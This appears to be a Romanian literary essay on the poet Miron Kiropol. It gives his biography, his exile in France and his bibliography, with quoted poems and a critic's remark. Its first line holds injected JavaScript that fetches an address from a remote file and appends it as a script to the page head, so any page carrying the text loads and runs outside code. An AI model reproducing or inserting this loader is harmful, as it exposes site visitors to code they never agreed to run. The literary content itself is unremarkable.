;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Mult mai vizibil după 1989, în lumea poeziei noastre de azi, Miron Kiropol (1936-2020) a fost un poet de profundă originalitate, oscilând o vreme între exprimarea lirică şi cea de pictor naiv – „pictorul ce plăsmuieşte din culori sufletele unei întregi galerii de personaje umile cu feţe de sfinţi fără de voie –, spune Constantin Abăluţă în prefaţa la volumul Neistovită inima vântului. Poeme alese de Constantin Abăluţă (Chişinău: Cartier, Cartier de colecţie Nr. 25, 2020) – portretele acestea hieratice, dar clocotind de un inegalabil freamăt lăuntric“ –; a oscilat şi între idiomul românesc şi cel francez, publicând volume în ambele limbi: Jocul lui Adam (1967); Schimbarea la faţă (1968); Rosarium (1969); Sur le visage redempteur (1972); Dieu me doit cette perte (1983); Auguste nostalgie du sang (1986); Chastete regnante (1987); Le Rang johannique (1989); Apophtegmes de l’amour (1989); Diotima, vol. I: Les morts s’en melant (1991); ediţia Oradea, 1997, vol. II: Scara lui Iacob (1998); Această pierdere (1992); Făt-Frumos din lacrimă, I-II (1994-1996); Augusta nostalgie a sângelui – Auguste nostalgie du sang, ediţie bilingvă (1997); Solitudinea lui Eros (1998); Ceea ce sferele gândesc despre noi (1999); Metopă (2001); Ioana d’Arc (2001); Povestea deviaţionistului, I (2003); Aur în sită (2014); Cuvinte strigându-şi cenuşa (2019) ş.a.
Între 1955-56, urmează cursuri la Facultatea de Filologie din Bucureşti, pe care o abandonează şi se perindă prin diverse locuri de muncă – arhivar, bibliotecar, muncitor agricol, corector la revista „Gazeta literară“ . Volumul Rosarium fiindu-i interzis, decide să plece din ţară („Mi s-a făcut aşa o foame de a fugi în lume“) şi profitând de o invitaţie la un colocviu de poezie ce urma să aibă loc în Belgia, sub şocul invadării Cehoslovaciei, decide să se stabilească în Franţa, unde urmează, timp de un an, cursurile Institutului Catolic. Lucrează ca paznic de muzeu; începe să picteze, reuşind să expună şi să se facă astfel remarcat, chiar vânzând câteva din tablourile sale. Are şansa de a fi sprijinit de Pierre Emmanuel, de Vintilă Horia ş.a. Revine în ţară după 1989, când îşi publică mai multe volume de versuri.
E un introvertit, un însingurat („o candidă singurătate“) poetizându-şi propriile trăiri lăuntrice. Aşa, odată cu înaintarea în vârstă: „Mi-a trecut viaţa şi iată-mă prins/ De ghearele şoimului./ În somn îmi amintesc naşterea/ Pe când mă apropii de moarte/ Ca de cea mai reală materie./ Dar nu-mi pare rău şi repet,/ Sub foşnirea acestei invizibile flori/ Cu rătăcire de iasomie,/ Cuvintele talismanului./ Am iubit şi urât asemenea tuturor muritorilor./ Aş fi vrut să mărturisesc mai mult dragostea/ Decât ura înaintea plutei apuse a soarelui,/ Dar n-am ştiut să-mi stăpânesc inima/ În mânia ei infantilă împotriva/ A tot ceea ce prin frumuseţe o depăşea./ Acum sunt ca orice bătrân/ Ce îşi coboară într-un puţ/ Din clipă în clipă lumina în beznă./ Acum va veni în sfârşit libertatea“ (Mi-a trecut viaţa). Însingurarea îl face să se apropie de înţelegerea lumii sub aspectul ei transcendental, aducând astfel în versuri o anume nostalgică religiozitate: „Mai dă-mi ziua de mâine, Doamne,/ Mai dă-mi lumina care în zori/ Iese din pămînt, din aer şi din apă,/ Se preface în cel mai puternic şi firav element./ Lumina pe care o nasc în ochii scrutând corăbierii/ Şi pasărea lăsată de Noe pe valuri/ Pentru a se întoarce cu ramura duhului în cioc./ Lumina alungându-mă din catacombe,/ Gâfâindu-mi în faţă şi pe urmele mele./ Lumina ce loveşte/ Scrumind locul unde a cercetat“ (Mai dă-mi ziua de mâine). E o poezie ce cuprinde în metaforicul ei suferinţele funciare ale omenirii, căreia i se substituie, poetul resimţind în propria existenţă vinovăţia primordială a acesteia; o poezie mărturisitoare şi dramatic penitentă, văzându-se pe sine ca pe un veşnic implicat asumat în patimile Mântuitorului: „Eu sunt cuiele cu care te-am crucificat, Dumnezeule,/ Şi numai atunci ochii au văzut,/ Auzul a primit auz,/ Mâinile au învăţat pipăitul,/ Iar picioarele mersul până la praguri“ (Eu sunt cuiele). Astfel, trăieşte „o fericire mitologică“, viaţa văzând-o derulându-se într-o dimensiune cu valenţe de cosmicitate („A trăi, ce basm câteodată macabru“ –Vârtej), în care biograficul devine în sine o frântură de sacralizare a propriului destin: „Sunt fiul lui Dumnezeu. Şi toate se petrec râzând şi plângând./ Iar sarea vremurilor îmi presară/ Mişcări cu cifru vechi./ Numele mi-e grecesc şi înseamnă Domn/ Al cetăţii sau al cerii./ Mi s-a spus, dar am uitat de frică/ Să nu-l văd pe Dumnezeu şi să mor./ Acum am îmbătrânit./ Am o pietricică în cocoaşă,/ O piatră neagră purtătoare de vânturi/ Din nord, şi pe ultima vertebră/ Muşcătura unui înger, crizantemă fără buze“ (Autoportret).
E, în toată această poezie, o vibraţie pasională discretă, o candidă trăire a sentimentului iubirii („Nemernica făptură cu care m-am născut/ Pe geana-ţi stă şi parcă e sărut/ Iubito-n codrul fără dafin/ Stau ca în rai/ Şi număr frunze moarte-n poala ta./ Tânăr sunt ca fluturele şi bătrân ca el/ Mă scutur într-un ceas de tot polenul“ – Deşi de mult împietrit), sau alteori, mai pasional: „Atinge-mă, iubito, cu genunchii tăi/ Atât de blânzi că mă caută vântul/ Ca altădată când purtai cunună/ De şcolăriţă şi-ţi sărutam pe ascuns mâna./ Vino acum când au să mă atace/ Fiare chemate cu nume de regi./ Vino acum, când e atâta pace/ Câtă numai în vis o înţelegi./ Prin noaptea ca o zăpadă neagră/ Parcă ai fi lumina din tanagră./ Totul în tine mă face să mă clatin/ Sunt beat de fiecare urmă/ A purităţii tale“ (Nu ştiu dacă pot veni). Dar mai puternic şi mai obsesiv e gândul plecării pe celălalt tărâm al existenţialităţii („Mă plimb la braţ cu viaţa de apoi!“), mereu copleşit de vârstă („Am îmbătrânit şi duc pe umeri/ Mai mult decât agonia acestui pământ“ – Departe de mine), un fior tragic strecurându-se în meditaţiile sale: „…pentru cei morţi/ A lor e patria totală,/ Iar cei vii le dăruiesc pământ/ din plin, să se simtă fiecare/ Mai bine decât viu./ Aşa va fi şi cu mine,/ Fără nimeni în carne,/ Uitat de patrie, sau numai aşa,/ Bătut pe umăr de vreo veche cunoştinţă/ care crede că mi-a fost/ Maestru viu şi acum, maestru mort,/ Câmp de glorie după o bătălie pierdută“ (Coacere). Melancolic şi sentimentalizat îşi filtrează, fără regrete, trecerea prin viaţă, oferindu-şi memoria ca pe un înscris testamentar: „Nu mai am nimic de pierdut,/ Nimic de câştigat/ De la steaua mea/ Decât o candidă singurătate./ Totul devine limpezime/ Ca într-un vechi pergament./ O neobosită invitaţie/ La dansul acestui fluture/ Ce dintre tâmplele mele zboară/ După ce s-a zbătut mort între ele“ (Fluture liberat).
Cu fină observaţie critică, Lucian Raicu nota pe marginea poeziei lui Miron Kiropol: „totul, inclusiv senzaţia de beatitudine, vine din suferinţă, dintr-o adâncă singurătate, din sentimentul de-a fi exilat în lume, din îndoiala de sine însuşi, din proximitatea eşecului (…) în termenii unui straniu extaz“.